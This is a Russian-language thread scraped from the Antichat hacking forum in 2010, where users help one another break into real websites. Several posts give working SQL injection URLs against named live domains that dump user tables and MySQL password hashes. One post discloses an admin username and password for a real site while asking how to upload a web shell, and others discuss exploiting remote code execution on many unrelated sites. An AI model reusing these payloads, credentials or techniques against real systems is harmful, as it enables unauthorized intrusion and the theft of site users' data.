Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.05.2010, 16:01
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
mailbrush, т.е. вот так:
Код:
http://www.mustad.no/catalog/products.php?id=adress_gde_shell
но так появляется ошибка (та же самая). Пробовал подставлять нулл байт, не помогло.
|
|
|
29.05.2010, 16:19
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
не факт что там allow_url_include=on
не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)
Последний раз редактировалось pinch; 29.05.2010 в 16:23..
|
|
|
|
29.05.2010, 16:31
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
Работа SQLI Helper V 2.7
Get Server Info
Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns
No. of columns : 1
Check No. of Columns - finished
Looking for larget text visible column
Col num 1 found
Check if supports union
Check if supports union - finished
Check Current user
Check Current user - finished
Check if database version
Check if database version - finished
Check Current Database
Check current database - finished
Checking LoadFile
Check Load File - finished
при Get Database:
Mysql is version 4 please brute either tables or columns
при Get Tables:
Mysql is version 4 please brute either tables or columns
при Get Collumns:
ничего, так как таблица не выбрана.
вывод этого же хелпера:
host Information Value
Server Apache/2.0.52(Red Hat)
Version 4.1.22
Powered by PHP/5.2.11
Attack Type SQL Union Injection
Current User blablabla@localhost
Current Database namebaseBS
Supports Union yes
Union Columns 1
чем брутить таблицу? Как до нее вообще добраться? |
|
|
|
29.05.2010, 16:34
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от pinch
не факт что там allow_url_include=on
не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)
А ничего, что там инклуда вообще нет? Что бы ни ставилии в id, в ошибке оно не инклудится
|
|
|
|
29.05.2010, 18:11
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Не могу залить шелл.
админка:http://zoor.biz/user/
Username:zbo_admin
password:shaka13
|
|
|
|
29.05.2010, 18:20
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Не могу залить шелл.
http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE &id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
name,
pass,
mail,
mode,
sort,
threshold,
theme,
signature,
signature_format,
created,
access,
login,
status,
timezone,
language,
picture,
init,
data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +hashoo_zbo.users+limit+1,1+--+
|
|
|
|
29.05.2010, 18:34
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от FlaktW
Не могу залить шелл.
http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE &id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
name,
pass,
mail,
mode,
sort,
threshold,
theme,
signature,
signature_format,
created,
access,
login,
status,
timezone,
language,
picture,
init,
data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +hashoo_zbo.users+limit+1,1+--+
В ПМ кинул!!
|
|
|
|
29.05.2010, 19:22
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?
ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет
НАпротив акка root вот такой хеш: 3649d1fc783e0b49
Последний раз редактировалось DrakonSerg; 29.05.2010 в 19:24..
|
|
|
|
29.05.2010, 19:25
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Пара вопросов по php, во первых, как через php inj найти директории на запись и вывести их на экран?
консольная команда find / -type d -perm 2 не пашет почти нигде, с учётом что системные команды выполняются нормально.
Далее столкнулся с такой траблой, что ни в одну директорию нельзя залить\создать файл, хотя права там полные, пробовал через fopen (далее конструкция fputs и т.д..), пробовал через copy, и через wget, всё одно и тоже, даже через echo пробовал создать тестовый файл в директории... как будто записи нету, хотя права на запись есть.
Таких сайтов много, все разные и друг с другом не связаны (их лишь связывает общяя уязвимость remote code), но ни на одном файлов не создать.
Инклуд так-же не пашет, шелл полностью нефункциональный. Может посоветуете что.
|
|
|
|
29.05.2010, 19:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от DrakonSerg
Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?
ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет
по этому нужно работать руками а не программами!
tables-- select+group_concat(table_name)+from+information_s chema.tables--
columns-- select+group_concat(column_name)+from_information_ schema.columns+where+table_name=" yourtable"
НАпротив акка root вот такой хеш: 3649d1fc783e0b49
hash type: MySQL
не твой сайт что ли?
http://www.southworth.com/page.php?id=-5+union+select+group_concat(user,0x3a,password,0x3 c42723e)+from+mysql.user
Последний раз редактировалось Konqi; 29.05.2010 в 19:30..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
